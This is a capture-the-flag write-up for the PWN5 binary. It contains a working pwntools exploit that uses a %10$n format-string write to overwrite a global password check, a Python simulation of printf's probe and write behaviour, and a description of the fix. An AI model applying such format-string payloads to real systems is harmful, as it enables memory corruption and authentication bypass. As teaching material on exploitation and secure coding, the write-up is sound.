Run checksec on the binary first.
Open it in IDA and look around: there is a format string vulnerability.
So the approach is simple: first find the offset of our input on the stack, then use the format string vulnerability's arbitrary address write to change the value of unk_804c044.
```python
from pwn import *

context.os = 'linux'
context.arch = 'i386'
context.log_level = 'debug'

sla = lambda x, y: io.sendlineafter(x, y)
io = remote('xxx', xxx)  # challenge host and port

# Our input is the 10th format argument: the first 4 bytes are the address of
# unk_804c044, and %10$n writes the number of bytes printed so far (4) there.
payload = p32(0x804c044) + b'%10$n'
sla(b'name:', payload)
# unk_804c044 is now 4, so 4 is the correct password
sla(b'passwd:', b'4')
io.interactive()
```
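As an added illustration that is not part of the original writeup, the following simulates the printf behaviour the two steps above depend on: the %10$x probe that confirms the offset, and why %10$n after a 4-byte address stores 4 in unk_804c044. The stack contents are constructed; only the address and the offset come from the writeup.

```python
import re
import struct

TARGET = 0x804c044   # address of unk_804c044, taken from the writeup
OFFSET = 10          # the writeup's result: the name buffer is format argument 10

def simulate_printf(fmt, args):
    """Emulate the part of printf a format-string write depends on.

    fmt is the attacker-controlled format string, args the words printf would
    read as positional arguments (args[k-1] is %k$). Returns (bytes printf
    would emit, {address: value}) where each %k$n stores the running byte
    count at the address held in argument k. Only literals, %k$x and %k$n
    are modelled; that is all this writeup's payload uses.
    """
    out, writes, i = b'', {}, 0
    spec = re.compile(rb'%(\d+)\$([xn])')
    while i < len(fmt):
        if fmt[i:i + 1] != b'%':             # literal byte: emitted unchanged
            out, i = out + fmt[i:i + 1], i + 1
            continue
        m = spec.match(fmt, i)
        if not m:
            raise ValueError(f'unsupported directive at byte {i}')
        arg = args[int(m.group(1)) - 1]      # positional argument k (1-based)
        if m.group(2) == b'n':
            writes[arg] = len(out)           # %n: write bytes-emitted-so-far
        else:
            out += f'{arg:x}'.encode()       # %x: print the word in hex
        i = m.end()
    return out, writes

def fake_stack(user_buf):
    """Constructed stand-in for the target's stack: filler words, then the
    first 4 bytes of the name buffer sitting at positional argument OFFSET."""
    word = struct.unpack('<I', user_buf[:4].ljust(4, b'\0'))[0]
    return [0] * (OFFSET - 1) + [word]

def probe_offset():
    """Step 1 (find the offset): a marker followed by %10$x echoes the marker
    back in hex only if the buffer really is argument 10."""
    payload = b'AAAA%10$x'
    return simulate_printf(payload, fake_stack(payload))[0]   # b'AAAA41414141'

def exploit_write():
    """Step 2 (the writeup's payload): four address bytes are emitted before
    %10$n fires, so unk_804c044 receives 4, which is why passwd is '4'."""
    payload = struct.pack('<I', TARGET) + b'%10$n'
    return simulate_printf(payload, fake_stack(payload))[1]   # {0x804c044: 4}
```

The root cause is passing user input as the format string itself; printf("%s", name) removes the bug, and gcc's -Wformat-security flags the pattern at compile time.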
Attachment: PWN5